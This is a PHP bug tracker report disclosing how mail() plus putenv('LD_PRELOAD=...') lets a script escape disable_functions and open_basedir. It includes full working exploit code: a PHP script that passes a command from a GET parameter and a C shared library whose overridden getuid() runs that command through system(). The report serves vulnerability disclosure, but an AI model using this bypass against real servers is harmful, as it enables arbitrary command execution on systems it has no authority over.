|
|
php.net | support | documentation | report a bug | advanced search | search howto | statistics | random bug | login |
PatchesPull RequestsHistoryAllCommentsChangesGit/SVN commits
[2008-12-08 11:59 UTC] jani@php.net
|
|||||||||||||||||||||||||||||||||||||
Copyright © 2001-2024 The PHP GroupAll rights reserved. |
Last updated: Sat Nov 23 05:01:32 2024 UTC |
Description: ------------ safe_mode is safe, but the mail() function should check environment variables IMO. e.g. you can putenv("LD_PRELOAD=evil_library.so"); and since mail() calls /usr/bin/mail if your library exports function like getuid() you can bypass open_basedir restrictions and restrictions on program execution, etc. If you need some more info, please contact me at: gat3way@gat3way.eu Milen Rangelov Reproduce code: --------------- A PHP script: <?php putenv("LD_PRELOAD=/var/www/a.so"); $a=fopen("/var/www/.comm","w"); fputs($a,$_GET["c"]); fclose($a); mail("a","a","a","a"); $a=fopen("/var/www/.comm1","r"); while (!feof($a)) {$b=fgets($a);echo $b;} fclose($a); ?> A simple library: #include <stdlib.h> #include <stdio.h> #include <string.h> int getuid() { char *en; char *buf=malloc(300); FILE *a; unsetenv("LD_PRELOAD"); a=fopen("/var/www/.comm","r"); buf=fgets(buf,100,a); write(2,buf,strlen(buf)); fclose(a); remove("/var/www/.comm"); rename("/var/www/a.so","/var/www/b.so"); buf=strcat(buf," > /var/www/.comm1"); system(buf); rename("/var/www/b.so","/var/www/a.so"); free(buf);return 0; } Expected result: ---------------- execute arbitrary commands even though we have: disable_functions = dl,system,exec,passthru,shell_exec,popen open_basedir = /var/www Actual result: -------------- The test was successful.